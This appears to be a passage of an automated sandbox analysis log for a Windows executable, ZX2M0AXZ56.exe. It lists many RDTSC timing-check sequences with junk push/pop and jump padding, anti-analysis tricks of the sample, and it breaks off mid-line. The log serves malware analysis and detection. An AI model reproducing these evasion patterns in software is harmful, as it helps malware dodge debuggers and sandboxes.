Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71F032 second address: 71F042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71F2D6 second address: 71F2DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71FB74 second address: 71FB8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B34E245FCh 0x00000008 push ebx 0x00000009 jg 00007F3B34E245F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72375F second address: 723767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 723BDD second address: 723BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24608h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 723D69 second address: 723D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 723EBF second address: 723EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 728F37 second address: 728F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Fh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72F09F second address: 72F0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72F490 second address: 72F49C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B34C1F666h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72F49C second address: 72F4D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3B34E24609h 0x00000008 jmp 00007F3B34E24609h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72FA75 second address: 72FA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72FA7B second address: 72FA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3B34E245F6h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72FBE8 second address: 72FBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3B34C1F666h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72FD84 second address: 72FD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72FD89 second address: 72FDA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F3B34C1F670h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72FDA5 second address: 72FDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 730643 second address: 730649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 730649 second address: 73064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 73064D second address: 73065F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3B34C1F66Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 73824F second address: 738287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F3B34E24608h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 73A9CB second address: 73A9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 73A9CF second address: 73A9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F3B34E245F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 73A9DF second address: 73A9EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3B34C1F666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 745B8F second address: 745B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 745B95 second address: 745BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F673h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 748C79 second address: 748C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 74BC5A second address: 74BC72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F3B34C1F666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3B34C1F66Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 74BC72 second address: 74BC77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7522F6 second address: 752301 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 757C4D second address: 757C5A instructions: 0x00000000 rdtsc 0x00000002 js 00007F3B34E245F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 757C5A second address: 757C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 757C60 second address: 757C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F3B34E24609h 0x0000000b jnc 00007F3B34E245F6h 0x00000011 pop ebx 0x00000012 popad 0x00000013 jo 00007F3B34E24604h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75B3B0 second address: 75B3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75B3B4 second address: 75B3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75B3B8 second address: 75B3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F3B34C1F66Eh 0x0000000e jbe 00007F3B34C1F666h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F3B34C1F66Ch 0x0000001f jo 00007F3B34C1F66Ch 0x00000025 jc 00007F3B34C1F666h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75B284 second address: 75B28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75E05F second address: 75E06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3B34C1F666h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75E06E second address: 75E076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75E076 second address: 75E085 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 75E085 second address: 75E095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007F3B34E245FEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 766959 second address: 766963 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7653E5 second address: 7653E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 765518 second address: 765573 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3B34C1F678h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 ja 00007F3B34C1F666h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3B34C1F677h 0x00000024 jmp 00007F3B34C1F672h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 765573 second address: 765591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3B34E24604h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 765591 second address: 7655AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7659F4 second address: 765A34 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B34E245FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007F3B34E24616h 0x00000011 jmp 00007F3B34E245FDh 0x00000016 jmp 00007F3B34E24603h 0x0000001b push ecx 0x0000001c jo 00007F3B34E245F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 768176 second address: 76819F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B34C1F666h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3B34C1F675h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76D1B9 second address: 76D1BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76D1BD second address: 76D1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CCF7 second address: 76CD07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3B34E245F6h 0x0000000a jnl 00007F3B34E245F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CD07 second address: 76CD17 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CD17 second address: 76CD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CE6B second address: 76CE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CE6F second address: 76CE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CE78 second address: 76CE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3B34C1F666h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B34C1F678h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CE9F second address: 76CEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CEA3 second address: 76CEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3B34C1F666h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CEB4 second address: 76CEC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CEC5 second address: 76CECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 76CECA second address: 76CED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 77AD24 second address: 77AD28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 77AD28 second address: 77AD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B34E24601h 0x0000000b push ecx 0x0000000c jo 00007F3B34E245F6h 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 777E51 second address: 777E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 788AEC second address: 788B13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F3B34E24606h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F3B34E245F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 788CA1 second address: 788CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 788CA7 second address: 788CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79E544 second address: 79E56B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B34C1F668h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F3B34C1F687h 0x00000012 jmp 00007F3B34C1F671h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79E56B second address: 79E56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79D438 second address: 79D442 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B34C1F666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79D71B second address: 79D78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34E24606h 0x00000009 popad 0x0000000a jmp 00007F3B34E24607h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F3B34E24604h 0x00000016 jmp 00007F3B34E24607h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3B34E245FFh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DA25 second address: 79DA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DA29 second address: 79DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3B34E245FFh 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DA42 second address: 79DA4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DA4D second address: 79DA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F3B34E245F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DE6B second address: 79DE77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3B34C1F666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DE77 second address: 79DE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 79DE7B second address: 79DE85 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B34C1F666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7A1218 second address: 7A122B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F3B34E245F8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7A122B second address: 7A1231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7A1231 second address: 7A1235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7A1235 second address: 7A1273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dl, 00000061h 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F3B34C1F668h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dx, ax 0x0000002b push 1C00486Ah 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 pop edi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7A14BA second address: 7A14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49903F7 second address: 499040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 499040A second address: 4990469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3B34E245FEh 0x0000000f push eax 0x00000010 jmp 00007F3B34E245FBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov ecx, 089FD0CBh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F3B34E245FEh 0x00000024 add al, FFFFFFD8h 0x00000027 jmp 00007F3B34E245FBh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 4990469 second address: 49904A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F3B34C1F672h 0x0000000e mov edx, dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bl, 7Ch 0x00000016 jmp 00007F3B34C1F676h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B05FE second address: 49B06EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e jmp 00007F3B34E245FAh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F3B34E24600h 0x0000001a mov ebp, esp 0x0000001c jmp 00007F3B34E24600h 0x00000021 xchg eax, ecx 0x00000022 jmp 00007F3B34E24600h 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007F3B34E24601h 0x0000002e pushfd 0x0000002f jmp 00007F3B34E24600h 0x00000034 jmp 00007F3B34E24605h 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F3B34E24603h 0x00000045 sbb eax, 394E7B8Eh 0x0000004b jmp 00007F3B34E24609h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F3B34E24600h 0x00000057 xor ax, FE08h 0x0000005c jmp 